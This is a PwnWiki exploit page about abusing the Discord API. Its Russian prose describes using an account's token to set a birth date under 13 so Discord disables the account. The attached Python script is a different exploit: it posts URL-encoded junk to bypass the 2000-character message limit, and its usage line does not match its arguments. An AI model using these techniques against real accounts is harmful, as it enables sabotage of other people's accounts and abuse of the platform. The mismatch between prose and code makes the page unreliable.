Злоупотребление API Discord 0day

From PwnWiki
Revision as of 15:56, 6 March 2021 by Pwnwiki (talk | contribs) (建立內容為「==Принцип уязвимости:== Установите дату рождения учетной записи меньше 13 лет, чтобы отклю…」的新頁面)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Hand.png 這個頁面需要補充,如果您了解該內容,請直接編輯詞條。


Принцип уязвимости:

Установите дату рождения учетной записи меньше 13 лет, чтобы отключить токены, потому что Discord автоматически отключит учетные записи, владельцам которых меньше 13 лет.

Обратите внимание, что учетные записи, которые уже настроили DoB, не подвержены этой уязвимости.

EXP:

Usage:

py example.py <token>
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos

import requests
import random
import sys

class Exploit:

    def __init__(self, token, channel):
        self.token = token
        self.channel_id = channel
        self.headers = {'Authorization': token}

    @property
    def uri(self):
        chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
        return f'<a://a{chars}>'

    def execute(self):
        """ send magical URI """
        return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})

    
def main():
    if len(sys.argv) < 3:
        print(f'Usage: py {sys.argv[0]} <token> <channel id>')
        sys.exit()

    token = sys.argv[1]
    channel_id = sys.argv[2]

    exploit = Exploit(token, channel_id)

    exploit.execute()


if __name__ == '__main__':
    main()

Автор:

Первоначальный автор неизвестен.